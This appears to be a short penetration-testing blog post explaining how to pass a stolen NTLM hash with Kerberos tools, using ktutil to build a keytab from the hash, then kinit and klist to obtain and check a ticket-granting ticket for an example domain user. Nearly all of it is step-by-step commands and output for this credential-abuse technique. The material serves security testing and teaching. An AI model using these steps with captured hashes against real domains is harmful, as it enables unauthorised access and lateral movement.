Pass the Hash with Kerberos

This blog post may be of limited use, most of the time, when you have an NTLM hash, you also have the tools to use it. But, if you find yourself in a situation where you don’t have the tools and do happen to have kerberos tools, you can pass the hash with it.

Lets say with have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step to do so is to create a keytab file using ktutil:

1

root@wpad:~# ktutil

At the ktutil prompt, type in the “add entry” (addent) command with the “principals” (-p) flag. Specify the user and an all uppercase version of the FQDN. Then the “KVNO” (-k 1), which is the key number. Finally the encryption type, which is rc4-hmac for NTLM hashes:

1

ktutil: addent -p uberuser@CORP.SOMEWHATREALNEWS.COM -k 1 -key -e rc4-hmac

After you hit enter you’ll get prompted for the rc4-hmac (NTLM) hash:

1

Key for uberuser@CORP.SOMEWHATREALNEWS.COM (hex): 88e4d9fabaecf3dec18dd80905521b29

Then we write the keytab file to disk and exit ktutil

1
2

ktutil: wkt /tmp/a.keytab
ktutil: exit

The last step before we can use our authentication is to create a kerberos ticket using our keytab file.

1
2
3
4
5

root@wpad:~# kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COM
Using default cache: /tmp/krb5cc_0
Using principal: uberuser@CORP.SOMEWHATREALNEWS.COM
Using keytab: /tmp/a.keytab
Authenticated to Kerberos v5

Validate it with klist:

1
2
3
4
5
6
7

root@wpad:~# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: uberuser@CORP.SOMEWHATREALNEWS.COM

Valid starting       Expires              Service principal
07/22/2018 21:38:43  07/23/2018 07:38:43  krbtgt/CORP.SOMEWHATREALNEWS.COM@CORP.SOMEWHATREALNEWS.COM
	renew until 07/23/2018 21:38:40